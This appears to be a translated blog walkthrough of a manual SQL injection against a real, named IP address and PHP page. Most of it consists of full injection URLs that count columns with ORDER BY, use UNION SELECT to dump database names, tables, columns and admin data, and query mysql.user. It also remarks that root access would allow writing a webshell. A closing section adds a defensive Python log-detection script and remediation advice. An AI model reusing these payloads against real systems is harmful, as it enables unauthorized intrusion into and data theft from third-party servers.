Hand-Injected Stick station

Source: Internet
Author: User

Injection point: http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109

Use ORDER BY to determine the number of fields

ORDER BY 25: error

ORDER BY 23: normal return

ORDER BY 24: try it

OK, ORDER BY 25 gives an error and ORDER BY 24 returns normally, so the number of fields is 24.

Next, use a UNION query to retrieve the database name, password, and so on.

Use database() to view the name of the database

Use version() to view the version number

Use @@datadir to view the path to the database

Use user() to view the user

Use system_user() to see who the current system user is

Use current_user() to look at the currently connected user

Haha, there it is. MySQL also has remote login open; it seems someone has already been here, since remote login is not enabled by default.

Use session_user() to see which user the current session is connected as

Use and Ord (User (), 1, 1) =114 to see what privileges the user has

OK, the page returned is different from the page shown when the error occurred, so the user has root privileges.

This is good: as long as you know the absolute path, you can write a one-liner in.

First use @@version_compile_os to see what the operating system is

Query information_schema to see what databases are available

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+table_schema%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_ schema.columns--

There are that many databases; the next step is the table names.

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.tables %20where%20table_schema=database%28%29--

Haha, straightforward enough: all the table names come out.

With the database name and table names dumped, the next thing to do is dump the fields.

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_ Schema.columns+where+table_name=0x61646d696e5f6d656e75

Note: 0x61646d696e5f6d656e75 is the hex encoding of admin_menu, one of the table names dumped above.

Using http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28admin_id,0x2b,allow_menu%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin_menu

This information is dumped, but it is not the administrator's account and password.

The method is the same, though:

and 1=2 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Mysql.user

http://203.246.61.24/ipsi/sub05/sub09_a.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,@ @version_ Compile_os,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20mysql.user
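
For the defending side, the request sequence in this walkthrough (ORDER BY column counting, UNION SELECT, environment functions, information_schema enumeration, hex-encoded table names) is easy to spot in web access logs. The following is an added example, not part of the original post: the log lines, IP addresses, paths and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines: documentation IP ranges, hypothetical paths.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /app/page.php?menu=109 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app/page.php?menu=109%20order%20by%2025 HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /app/page.php?menu=109%20and%201=2%20union%20select%201,2,3,database%28%29,5-- HTTP/1.1" 200 5170',
    '198.51.100.7 - - [01/Jan/2024:10:00:14 +0000] "GET /app/page.php?menu=109%20and%201=2%20union%20select%201,group_concat%28column_name%29%20from%20information_schema.columns+where+table_name=0x61646d696e5f6d656e75 HTTP/1.1" 200 5400',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /app/search.php?q=order+by+phone HTTP/1.1" 200 2048',
]

# One rule per step of the walkthrough; the rule names are this example's own.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b|\bmysql\.user\b", re.I),
    "env_function": re.compile(
        r"@@\w+|\b(database|version|(system_|session_|current_)?user)\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify(line):
    """Return the sorted rule names matching the decoded query string."""
    m = REQUEST.search(line)
    if not m:
        return []
    query = unquote_plus(urlsplit(m.group(1)).query)
    # Collapse inline comments and whitespace runs used to split keywords.
    query = re.sub(r"/\*.*?\*/|\s+", " ", query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))


def report(lines):
    """Group hits per client IP so a probing sequence reads as one finding."""
    hits = {}
    for line in lines:
        rules = classify(line)
        if rules:
            hits.setdefault(line.split()[0], set()).update(rules)
    return {ip: sorted(found) for ip, found in hits.items()}


if __name__ == "__main__":
    for ip, found in report(SAMPLE_LOG).items():
        print(ip, found)
```

Keyword matching like this is triage only. The fix for a numeric parameter such as menu is to validate it as an integer and bind it in a prepared statement, and to run the application under a database account that is not root.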
